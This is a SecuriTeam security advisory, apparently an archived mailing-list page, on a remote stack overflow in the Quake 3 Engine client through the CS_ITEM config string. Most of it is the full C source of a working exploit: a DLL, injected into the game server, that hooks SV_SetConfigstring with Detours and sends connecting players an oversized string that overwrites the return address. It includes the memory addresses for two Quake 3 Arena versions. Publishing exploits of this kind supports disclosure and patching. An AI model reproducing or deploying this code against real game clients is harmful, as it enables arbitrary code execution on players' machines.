[EXPL] Quake 3 Engine Client CS_ITEM Stack Overflow (Exploit)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Quake 3 Engine Client CS_ITEM Stack Overflow (Exploit)
------------------------------------------------------------------------


SUMMARY

Improper handling of user input allows attackers to execute arbitrary code
using the Quake 3 Engine.

DETAILS

Vulnerable Systems:
* Quake 3 Engine Client

/*
Quake 3 Engine Client CS_ITEM Remote Stack Overflow Exploit (Win32)
Written by RunningBon

E-Mail: runningbon at gmail.com
IRC: irc.rizon.net #kik

This is a DLL, which gets injected into the server exe.

You will need Microsoft Detours library to compile this exploit
(http://research.microsoft.com/sn/detours/)
I recommend you compile this with Microsoft Visual C++

Use this reponsibly. You are responsible for any damage you cause using
this.

How it works? Sends an oversized Q3 CS_ITEM ConfigString packet to the
client, which goes through a vulnarable function and overflows,
overwriting the stack.

Info:
The engine strips bytes >127, '%', and '\0' before it overflows, so you
will need encoded shellcode and an EIP which doesn't contain any of these
characters.
*/

#include <stdio.h>
#include <windows.h>
#include <detours.h>

struct VersionStruct {
char *pVersionString;
DWORD dwVersionStringAddr;
DWORD dwSetConfigstringAddr;
DWORD dwFillSize;
DWORD dwNewEIP;
int iCS_ITEM;
};

VersionStruct Versions[] = {
{ "Quake 3: Arena", 0x4C1B94, 0x431E70, 836, 0x13333337, 27 },
//Quake 3 Arena 1.32c
{ "Quake 3: Arena", 0x4D2184, 0x438610, 836, 0x13333337, 27 },
//Quake 3 Arena 1.32b
};

VersionStruct *pVersion = NULL;

void (*orig_SV_SetConfigstring)(int iIndex, const char *pVal);
void SV_SetConfigstring_Hook(int iIndex, const char *pVal)
{
char szString[4096];
char *pPtr = NULL;

if(pVersion != NULL)
{
if(iIndex == pVersion->iCS_ITEM)
{
memset(szString, 0, sizeof(szString));
pPtr = &szString[0];

memset(pPtr, 'a', pVersion->dwFillSize);
pPtr += pVersion->dwFillSize;

memcpy(pPtr, (LPVOID)&pVersion->dwNewEIP,
sizeof(DWORD));
pPtr += sizeof(DWORD);

orig_SV_SetConfigstring(iIndex, szString);

return;
}
}

orig_SV_SetConfigstring(iIndex, pVal);
}

bool WINAPI DllMain(HINSTANCE hInst, DWORD dwReason, LPVOID lpReserved)
{
if(dwReason == DLL_PROCESS_ATTACH)
{
for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]);
i++)
{

if(!stricmp((char*)Versions[i].dwVersionStringAddr,
Versions[i].pVersionString))
{
pVersion = &Versions[i];
break;
}
}

if(pVersion == NULL)
{
//Could not find correct version
return 1;
}

DetourFunction((BYTE*)pVersion->dwSetConfigstringAddr,
(BYTE*)SV_SetConfigstring_Hook);
_asm mov [orig_SV_SetConfigstring], eax
}

return 1;
}

/* EoF */


ADDITIONAL INFORMATION

The information has been provided by <mailto:runningbon@xxxxxxxxx>
runningbon.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [EXPL] WinPcap NPF.SYS Privilege Elevation Vulnerability (PoC exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WinPcap NPF.SYS Privilege Elevation Vulnerability ... Windows 2003 Server ... typedef DWORD (LPVOID ImageBase, ...
    (Securiteam)
  • [EXPL] Microsoft Windows CSRSS Local Privileges Escalation (MS05-018, Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... * Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service ... /* 0x18 */ DWORD FontFamily; ... char cmd; ...
    (Securiteam)
  • [NEWS] McAfee ePolicy Orchestrator Remote Compromise
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... request, UUID, and computer hostname. ... The data that follows first specifies a directory and xml filename, ... +06h DWORD file offset of XML ...
    (Securiteam)
  • [EXPL] Windows Compressed Zip File Exploit Code (MS04-034)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WORD CompressionMethod; ... DWORD UncompressedSize; ... WORD FilenameLength; ...
    (Securiteam)
  • [EXPL] Vulnerability in Server Message Block Could Allow Elevation of Privilege (MS06-030, Explo
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... * Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service ... typedef DWORD (LPVOID ImageBase, ... InBuff, 2, // InBuffer, InBufferSize ...
    (Securiteam)